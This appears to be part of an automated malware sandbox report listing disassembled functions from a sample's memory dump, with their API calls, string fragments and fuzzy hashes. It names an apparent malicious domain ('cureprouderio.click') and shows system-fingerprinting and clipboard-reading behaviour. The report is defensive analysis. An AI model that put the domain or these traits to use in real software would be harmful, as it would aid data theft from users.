Opcode Fuzzy Hash: f3d6e681243fa1ea4e38786e90c45e17c2d7b901f5dece09e90d91d35b5a6c58
Instruction Fuzzy Hash: FC112B647093814ADB288B35D8B47ABBFE19B97300F98C47DD0C9C7352DA3884058B16

Function 0040CA78 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CA8A
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CAA2

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: c40939e148ed26e8a34c5a6524a376bb1b4e322d26a4c60e3fdeeb8eb2207811
Instruction ID: 4c1739ecc6f51a730df9b9c6b9f4d254eb590c17dbd2a3e2b21917804cc04e0b
Opcode Fuzzy Hash: c40939e148ed26e8a34c5a6524a376bb1b4e322d26a4c60e3fdeeb8eb2207811
Instruction Fuzzy Hash: 13E067383D9342BAFA784B54EC57F1632155756F22F348319F7213E2E499E03505861C

Function 0042FC43 Relevance: 1.6, APIs: 1, Instructions: 86COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042FD2F

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: dd4a7cf2b61290e77a86f3d6e75972815b049e1c8efe30d7f1e5f638191c72f1
Instruction ID: e1c7cbc6fd4ec756b395759f55f607dbbf1a78fd1fc33f52fb07c495b50da5c7
Opcode Fuzzy Hash: dd4a7cf2b61290e77a86f3d6e75972815b049e1c8efe30d7f1e5f638191c72f1
Instruction Fuzzy Hash: 03219F3121C3918BD7258B3598647FBBBE5AF92304F58047EC4CAD7292DB354509CB56

Function 0042FC3F Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042FD2F

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 9484ff4a2c7411c22de977fbef2d9306b192cc493bc3b6f187e3fb30e4358122
Instruction ID: a8dea198c6d6a302cacdb9d103fa461b91f7d2a5fe4f5180c7b58a4a78c4ef1c
Opcode Fuzzy Hash: 9484ff4a2c7411c22de977fbef2d9306b192cc493bc3b6f187e3fb30e4358122
Instruction Fuzzy Hash: D311C4312187918BD725CB24D864BFFBBE6EB82314F59047EC4CAD7291DB354405CB46

Function 0043A620 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 0043A645

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: 746353191417155f4572f63a24942053cabb3d18a5190f262af1c316e6feb13b
Instruction ID: 1746dc74b3ee8bb3c6e68a6c03d36a0517749215685c669f8434a035c0f23aff
Opcode Fuzzy Hash: 746353191417155f4572f63a24942053cabb3d18a5190f262af1c316e6feb13b
Instruction Fuzzy Hash: 02112C31A042858FCB24CF79CC443997F626B9A320F2982EEC4D4633C5C6345A458B52

Function 00441A20 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B714,00000000,00000001), ref: 00441A52

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: df6b372685eac238b0cbf86ec5d77683a66144ef3af92b4f4570ba87fa234b38
Instruction ID: 3780c0ce7fa2bd92c647f383c6fac8caa5da4491464b1ac9f6758d099bc30e9d
Opcode Fuzzy Hash: df6b372685eac238b0cbf86ec5d77683a66144ef3af92b4f4570ba87fa234b38
Instruction Fuzzy Hash: 7AE02B36815210ABE2012F387C06A2736649F87711F01083AF41167121DA39E851C5AE

Function 00433675 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 004336BE

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 337c8f184c3d593f93e5cab8429b65878883a1554cf17bffd1bf6bca0b93a479
Instruction ID: 398da199b8e3a1020fcfa2b0fa625fd34d841062974310efd4600a10aeef45e9
Opcode Fuzzy Hash: 337c8f184c3d593f93e5cab8429b65878883a1554cf17bffd1bf6bca0b93a479
Instruction Fuzzy Hash: C0F028B4108701CFE350DF29D5A471ABBF0FB85304F11885CE5998B3A0DBB6A949CF82

Function 00436EC9 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00436F0F

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 5e2b27c9aa2431814009c26a595da87a53ceb8f2862eb08b32145193655a7d65
Instruction ID: 9aad8d6282ae665baaba335db348cb7c9737f63809f499662c92501816035f39
Opcode Fuzzy Hash: 5e2b27c9aa2431814009c26a595da87a53ceb8f2862eb08b32145193655a7d65
Instruction Fuzzy Hash: 5BF0D4702087018FE354DF25C5A471BBBE2BB89304F51881CE0954B394C7B6A949CF82

Function 0040CA30 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CA43

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 56a87f141098922d5c0e058dbf79e718c55c23b20e215898977bc1ef41233e3f
Instruction ID: a23ef46bac32c01104ce83db776f11a22db28601e9dce13b869127271299a428
Opcode Fuzzy Hash: 56a87f141098922d5c0e058dbf79e718c55c23b20e215898977bc1ef41233e3f
Instruction Fuzzy Hash: B9D05E251511486BD314671C9C46F623618CB53715F40022DE6A3C66D1EA116914A6AA

Function 00441BF0 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00441CCD

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 108d996dc94b95bbf6987d24780a4143cedb15d57702b8a624ae5dbb73d3e471
Instruction ID: cd23a75c3d331c548bd4a0bcc2d746a8548531e1832ca2e21b4e809e46d5501c
Opcode Fuzzy Hash: 108d996dc94b95bbf6987d24780a4143cedb15d57702b8a624ae5dbb73d3e471
Instruction Fuzzy Hash: 09E0C7BAD002418FD700DF20ECD287433A1EB0A30A350003AE143E33A2EA31A50ADB18

Function 00440130 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?,00441A6B,?,0040B714,00000000,00000001), ref: 00440150

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 42860730b8c291ffcc989e7e7cfc41f2716a070f1422329604c03640d2dc23ae
Instruction ID: 97de80712a1c9d7efed8753421b3abc946687d2d5e46b742ebd0d880f099b6b3
Opcode Fuzzy Hash: 42860730b8c291ffcc989e7e7cfc41f2716a070f1422329604c03640d2dc23ae
Instruction Fuzzy Hash: CDD0C931405522EBC6102F18BC16BC73B959F59621F4749A5F8446A0B5D625EC918AD8

Function 00440110 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,00408A07,?,00408A07), ref: 00440120

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 198c2b16cedc6c8e02f335225e2cf723bdd6251d09b0c68c849e427fb8507948
Instruction ID: b916ea06360421476b7972ade889891ae18363125206af22970fe04e6def0aec
Opcode Fuzzy Hash: 198c2b16cedc6c8e02f335225e2cf723bdd6251d09b0c68c849e427fb8507948
Instruction Fuzzy Hash: 15C09B31045120BBD6142F15FC05FC63F55DF65751F420195F44467071C764AC41C6D8

Non-executed Functions

Function 004242FC Relevance: 100.4, Strings: 80, Instructions: 403COMMON

Download Yara Rule

Strings

e, xrefs: 004243E5
h, xrefs: 0042448D
n, xrefs: 00424486
Q, xrefs: 00424582
, xrefs: 0042481A
=, xrefs: 00424756
8, xrefs: 00424328
A, xrefs: 00424795
d, xrefs: 0042449B
Z, xrefs: 00424A4A
U, xrefs: 004244CC
~, xrefs: 00424611
Q, xrefs: 00424805
{, xrefs: 004246FB
Y, xrefs: 004247CD
3, xrefs: 0042488A
<, xrefs: 00424908
<, xrefs: 004247AA
U, xrefs: 004244BE
O, xrefs: 0042474F
yD, xrefs: 004245D2
`, xrefs: 00424401
T, xrefs: 004244B7
`, xrefs: 004243FA
h, xrefs: 004243DE
u, xrefs: 00424709
., xrefs: 00424860
7, xrefs: 0042494E
g, xrefs: 0042441D
g, xrefs: 0042446A
!, xrefs: 0042496A
F, xrefs: 00424A2E
G, xrefs: 00424787
I, xrefs: 0042475D
u, xrefs: 0042447F
-, xrefs: 0042487C
", xrefs: 00424978
|, xrefs: 004243D7
2, xrefs: 00424932
v, xrefs: 00424447
j, xrefs: 00424455
L, xrefs: 004244DA
S, xrefs: 00424813
C, xrefs: 004247A3
%, xrefs: 00424940
~, xrefs: 00424471
_, xrefs: 004247BF
U, xrefs: 00424A3C
>, xrefs: 0042495C
|, xrefs: 0042444E
A934FF48BFBB394A296653E0D0DADA99, xrefs: 00424692
E, xrefs: 00424779
K, xrefs: 0042476B
w, xrefs: 00424717
f, xrefs: 004244B0
a, xrefs: 0042440F
M, xrefs: 00424741
Q, xrefs: 004244C5
1, xrefs: 00424898
}, xrefs: 0042459A
', xrefs: 00424321
], xrefs: 004247B1
9, xrefs: 004246F4
cureprouderio.click, xrefs: 00424AEB
W, xrefs: 004247F7
<, xrefs: 00424916
[, xrefs: 004247DB
_, xrefs: 004245FD
i, xrefs: 004244A9
w, xrefs: 00424408
s, xrefs: 00424733
q, xrefs: 00424463
N, xrefs: 004244E1
7, xrefs: 00424924
|, xrefs: 00424424
U, xrefs: 004247E9
\, xrefs: 004244D3
q, xrefs: 00424725
|, xrefs: 004243F3
z, xrefs: 004243EC

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: $!$"$%$'$-$.$1$2$3$7$7$8$9$<$<$<$=$>$A$A934FF48BFBB394A296653E0D0DADA99$C$E$F$G$I$K$L$M$N$O$Q$Q$Q$S$T$U$U$U$U$W$Y$Z$[$\$]$_$_$`$`$a$cureprouderio.click$d$e$f$g$g$h$h$i$j$n$q$q$s$u$u$v$w$w$z${$|$|$|$|$}$~$~$yD
API String ID: 0-4014965281
Opcode ID: 30a4799edb0042b11bd9ce4ac38b7a2efa1c714f7e06be26602dd4942d61b840
Instruction ID: ee02fd026e1ba763da8399bd0062cf2ea4200e2c7c0443067976a1a076b118b1
Opcode Fuzzy Hash: 30a4799edb0042b11bd9ce4ac38b7a2efa1c714f7e06be26602dd4942d61b840
Instruction Fuzzy Hash: 5E32022090C7E9C9DB32C67C9C487DDBE615B67324F0843D9D1E86B3D2D2790A85CB66

Function 0043A732 Relevance: 75.4, Strings: 60, Instructions: 390COMMON

Download Yara Rule

Strings

1, xrefs: 0043AC45
?, xrefs: 0043A8FE
, xrefs: 0043A826
4, xrefs: 0043A7F6
?, xrefs: 0043A8E6
}, xrefs: 0043A761
;, xrefs: 0043A892
N, xrefs: 0043A7D8
2, xrefs: 0043A91E
\, xrefs: 0043A75A
', xrefs: 0043AACE
P, xrefs: 0043A936
=, xrefs: 0043A89A
1, xrefs: 0043A86A
+, xrefs: 0043AAB2
4, xrefs: 0043AC2F
m, xrefs: 0043A7D1
i, xrefs: 0043A7B5
{, xrefs: 0043A753
), xrefs: 0043AAA4
%, xrefs: 0043AAC0
/, xrefs: 0043AA96
e, xrefs: 0043A799
5, xrefs: 0043A87A
k, xrefs: 0043A7C3
D, xrefs: 0043A792
;, xrefs: 0043A90E
o, xrefs: 0043A7DF
a, xrefs: 0043A96E
9, xrefs: 0043A88A
<, xrefs: 0043A816
3, xrefs: 0043A872
-, xrefs: 0043A8DA
%, xrefs: 0043A926
7, xrefs: 0043A882
!, xrefs: 0043A8AA
g, xrefs: 0043A7A7
#, xrefs: 0043A8B2
0, xrefs: 0043A8F6
K, xrefs: 0043A906
%, xrefs: 0043A8BA
!, xrefs: 0043A946
y, xrefs: 0043A745
3, xrefs: 0043AA7A
>, xrefs: 0043A916
/, xrefs: 0043A8E2
a, xrefs: 0043A77D
?, xrefs: 0043A8A2
', xrefs: 0043A8C2
g, xrefs: 0043A976
+, xrefs: 0043A8D2
#, xrefs: 0043A95E
!, xrefs: 0043AADC
, xrefs: 0043AAD5
c, xrefs: 0043A78B
), xrefs: 0043A8CA
., xrefs: 0043A93E
8, xrefs: 0043A86E
Y, xrefs: 0043A94E
-, xrefs: 0043AA88

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: $ $!$!$!$#$#$%$%$%$'$'$)$)$+$+$-$-$.$/$/$0$1$1$2$3$3$4$4$5$7$8$9$;$;$<$=$>$?$?$?$D$K$N$P$Y$\$a$a$c$e$g$g$i$k$m$o$y${$}
API String ID: 0-829060353
Opcode ID: 6095a1f0a7fa12a1556f2bedbdbd28db1bbaf83593562b7b92d4bc24bb86bd5b
Instruction ID: 54b3d74fe963219af8f38555adfa9f753f2f85cd4f446e50d1a1267637ec6556
Opcode Fuzzy Hash: 6095a1f0a7fa12a1556f2bedbdbd28db1bbaf83593562b7b92d4bc24bb86bd5b
Instruction Fuzzy Hash: E21253219087D9C9DB22C67C88483DDBFA25B67324F1843D9D0E56B3D3C7B90646CB66

Function 0043B98C Relevance: 75.4, Strings: 60, Instructions: 389COMMON

Download Yara Rule

Strings

P, xrefs: 0043BB92
D, xrefs: 0043B9EE
1, xrefs: 0043BEA1
+, xrefs: 0043BB2E
?, xrefs: 0043BAFE
!, xrefs: 0043BD38
-, xrefs: 0043BB36
0, xrefs: 0043BB52
., xrefs: 0043BB9A
N, xrefs: 0043BA34
', xrefs: 0043BB1E
%, xrefs: 0043BD1C
9, xrefs: 0043BAE6
), xrefs: 0043BD00
a, xrefs: 0043B9D9
, xrefs: 0043BD31
!, xrefs: 0043BBA2
?, xrefs: 0043BB5A
), xrefs: 0043BB26
', xrefs: 0043BD2A
=, xrefs: 0043BAF6
-, xrefs: 0043BCE4
2, xrefs: 0043BB7A
o, xrefs: 0043BA3B
7, xrefs: 0043BADE
;, xrefs: 0043BAEE
a, xrefs: 0043BBCA
8, xrefs: 0043BACA
#, xrefs: 0043BB0E
g, xrefs: 0043BBD2
\, xrefs: 0043B9B6
k, xrefs: 0043BA1F
<, xrefs: 0043BA72
!, xrefs: 0043BB06
}, xrefs: 0043B9BD
g, xrefs: 0043BA03
/, xrefs: 0043BB3E
y, xrefs: 0043B9A1
c, xrefs: 0043B9E7
%, xrefs: 0043BB16
>, xrefs: 0043BB72
%, xrefs: 0043BB82
+, xrefs: 0043BD0E
1, xrefs: 0043BAC6
4, xrefs: 0043BE8B
#, xrefs: 0043BBBA
?, xrefs: 0043BB42
K, xrefs: 0043BB62
;, xrefs: 0043BB6A
, xrefs: 0043BA82
4, xrefs: 0043BA52
m, xrefs: 0043BA2D
{, xrefs: 0043B9AF
e, xrefs: 0043B9F5
5, xrefs: 0043BAD6
i, xrefs: 0043BA11
3, xrefs: 0043BCD6
/, xrefs: 0043BCF2
Y, xrefs: 0043BBAA
3, xrefs: 0043BACE

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: $ $!$!$!$#$#$%$%$%$'$'$)$)$+$+$-$-$.$/$/$0$1$1$2$3$3$4$4$5$7$8$9$;$;$<$=$>$?$?$?$D$K$N$P$Y$\$a$a$c$e$g$g$i$k$m$o$y${$}
API String ID: 0-829060353
Opcode ID: 19abe811546a7b44870ab7d072d4adfd81bdd444710bb40b2c04f15bebe7a9a6
Instruction ID: d7e26ee1e4c9c081a57c59d0cf5a78665c4b03d5c22c199e3e2a8b6290abf04a
Opcode Fuzzy Hash: 19abe811546a7b44870ab7d072d4adfd81bdd444710bb40b2c04f15bebe7a9a6
Instruction Fuzzy Hash: 72126421D0C7D989DB22C67C88483DDBFA15B23324F1843D9D4E56B3D2C7B90A46CBA6

Function 00409270 Relevance: 15.4, Strings: 12, Instructions: 406COMMON

Download Yara Rule

Strings

YCLH, xrefs: 004092A3
QQU[, xrefs: 00409386
TC]P, xrefs: 004092AB
I, xrefs: 004092C3
PW, xrefs: 004093FE
fi`7, xrefs: 0040939E
G@Z[, xrefs: 004092BB
JTHU, xrefs: 00409356
jldt, xrefs: 00409396
ZZxG, xrefs: 0040968C
KMYS, xrefs: 0040936E
c, xrefs: 00409405

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: G@Z[$I$JTHU$KMYS$PW$QQU[$TC]P$YCLH$ZZxG$c$fi`7$jldt
API String ID: 0-1929047347
Opcode ID: 1a30632d769d9c48c3a111a3fcc0c9ec320ee59700cad142e5e205578aa34a67
Instruction ID: a2a03eab4d10751d88cee7199f22afb12858568c14e3cff19f226ae60700038e
Opcode Fuzzy Hash: 1a30632d769d9c48c3a111a3fcc0c9ec320ee59700cad142e5e205578aa34a67
Instruction Fuzzy Hash: 27C1B27260C7918AD726CF69845036BFFE19F97304F0849ADE4D5AB382C67DC80AC796

Function 0043C710 Relevance: 15.2, Strings: 12, Instructions: 243COMMON

Download Yara Rule

Strings

~, xrefs: 0043C783
|, xrefs: 0043C71E
?, xrefs: 0043C72D
}, xrefs: 0043C723
~, xrefs: 0043C728
3, xrefs: 0043C7E6
R, xrefs: 0043C916
?, xrefs: 0043C788
o, xrefs: 0043C925
|, xrefs: 0043C779
y, xrefs: 0043C920
}, xrefs: 0043C77E

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: 3$?$?$R$o$y$|$|$}$}$~$~
API String ID: 0-1894887626
Opcode ID: 381b3ea6373fc44e096e417e7a1610065c750b2d54b4ad026ef7c53cf8908a3a
Instruction ID: 749c804d918d00c2747387fd0af68a65b98fa22d3cccb4b51b959c7623c2c309
Opcode Fuzzy Hash: 381b3ea6373fc44e096e417e7a1610065c750b2d54b4ad026ef7c53cf8908a3a
Instruction Fuzzy Hash: CE91F26290C7D18AD711913C888435BEFD25BE7264F1D8AAEE4E5973C2D26DC906C363

Function 00416BC5 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 314COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00416F3D

Strings

RhY, xrefs: 00416F4F
<^\, xrefs: 00416C55
BC@, xrefs: 00416C2C
<^\, xrefs: 00416E44, 00416D50, 00416DE3, 00416ECF
RhY, xrefs: 00416F9A
OHI, xrefs: 00416E29

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: <^\$<^\$BC@$OHI$RhY$RhY
API String ID: 237503144-741266563
Opcode ID: ff748a6f2a9406d04d0b62d120be0e928416eb5be3c0a2bdbe0056f6c4ce229e
Instruction ID: ccace58a3f60d3b9026df992922d4a994ad5053f6ac8939b816beae621713c40
Opcode Fuzzy Hash: ff748a6f2a9406d04d0b62d120be0e928416eb5be3c0a2bdbe0056f6c4ce229e
Instruction Fuzzy Hash: A4B10A76A143218BC728CF28C4912ABB7E2FFD4750F1A992DE8C58B751D778C845C785

Function 00425FD0 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 294COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 0042610A
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0042618C

Strings

WT, xrefs: 0042605A
S4P:, xrefs: 00426012
F,AR, xrefs: 00426042
G ]&, xrefs: 0042602A
G, xrefs: 00425FEA

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: F,AR$G$G ]&$S4P:$WT
API String ID: 237503144-96539001
Opcode ID: d60756b42324a1f16619eaa2b62ea9e693e0892a0c73b341cf52406c34cccc7a
Instruction ID: 7d59669e374baf9c3aba4896d85df4f74f4e507733c041cfdb6ea39f1e2b64f2
Opcode Fuzzy Hash: d60756b42324a1f16619eaa2b62ea9e693e0892a0c73b341cf52406c34cccc7a
Instruction Fuzzy Hash: CEA10271A083499FE714CF24D98179EBBF0FB85304F14846DE5989B281D779990ACF86

Function 0041775C Relevance: 10.3, Strings: 8, Instructions: 296COMMON

Download Yara Rule

Strings

`" , xrefs: 0041788D
^_, xrefs: 00417961
Rb, xrefs: 004178A3
\6[4, xrefs: 00417856
D, xrefs: 00417B0B
\>P<, xrefs: 0041786C
!., xrefs: 00417898
|, xrefs: 00417764

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: !.$D$Rb$\6[4$\>P<$^_$`" $|
API String ID: 0-2085951561
Opcode ID: 436aae97e1d0d9398f1c68596ab4f7c905c93c2e226989ce861870e44f759456
Instruction ID: 91745d508181d1f71d8587d7858a69c1ef8ac54284bdad98f56b6e4556e84ae2
Opcode Fuzzy Hash: 436aae97e1d0d9398f1c68596ab4f7c905c93c2e226989ce861870e44f759456
Instruction Fuzzy Hash: 07A158B01183408FE3648F15C8A5BABBBF1FF82304F45995DE4894B6A1E7B89944CB56

Function 00437820 Relevance: 9.2, APIs: 6, Instructions: 180clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00437842
GetClipboardData.USER32 ref: 00437863
CloseClipboard.USER32 ref: 00437A3A

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseDataOpen
String ID:
API String ID: 2058664381-0
Opcode ID: 6046f087d4e92390ae92f7cc4c75892527e47a8950a54cd6f127afc00c11451a
Instruction ID: 602d8a67bae10d56d699e639d4c574d0d92dcc62e263700393fe2ea992f95cce
Opcode Fuzzy Hash: 6046f087d4e92390ae92f7cc4c75892527e47a8950a54cd6f127afc00c11451a
Instruction Fuzzy Hash: 6E61F3B1D18A518BD700EF7CC88539EBFE1AB09314F09863ED4A4D7381D3799958C7A6

Function 0041C620 Relevance: 8.1, Strings: 6, Instructions: 596COMMON

Download Yara Rule

Strings

M|, xrefs: 0041CA46
IB, xrefs: 0041CA4E
XJ, xrefs: 0041CA3E
rp, xrefs: 0041C937
GG, xrefs: 0041CA36
3~|, xrefs: 0041C797

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: 3~|$GG$IB$M|$XJ$rp
API String ID: 0-2624876186
Opcode ID: b748a71fd87c28f97b49bfdad335c97206a59167b4be98b66b275dc1da8b7a3c
Instruction ID: 5ac4791b5c286e6892f67fdd4ac99fdbd38ecb53b660696c657748d16206a7ae
Opcode Fuzzy Hash: b748a71fd87c28f97b49bfdad335c97206a59167b4be98b66b275dc1da8b7a3c
